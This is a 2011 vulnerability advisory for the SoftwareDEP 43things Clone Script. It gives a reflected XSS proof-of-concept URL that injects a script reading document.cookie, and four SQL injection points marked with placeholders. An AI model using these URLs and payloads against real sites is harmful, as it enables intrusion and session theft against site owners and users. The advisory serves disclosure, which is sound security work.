SoftwareDEP 43things Clone Script Multiple Vulnerabilities

2011.08.19

Credit: v3n0m

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

-----------------------------------------------------------------------
SoftwareDEP 43things Clone Script Multiple Vulnerabilities
 
Author     : v3n0m
Discovered : August, 18-2011 GMT +7:00 Jakarta, Indonesia
Software   : 43things Clone script
Developer  : http://www.softwaredep.com/
Price      : $700
Version    : v2 Lower versions may also be affected
-----------------------------------------------------------------------

PoC:
---

XSS Injection:
-------------
http://www.domain.tld/[path]/zeitgeist/tag_list.php?tag=<script>alert(document.cookie)</script>

SQL Injection:
-------------
http://www.domain.tld/[path]/thing_detail.php?thingid=[SQLi]
http://www.domain.tld/[path]/thingshome.php?uid=[SQLi]
http://www.domain.tld/[path]/recent_activity.php?uid=[SQLi]
http://www.domain.tld/[path]/year_in_review.php?uid=[SQLi]

Credits:
-------
www.yogyacarderlink.web.id - irc.yogyacarderlink.web.id

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

SoftwareDEP 43things Clone Script Multiple Vulnerabilities

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.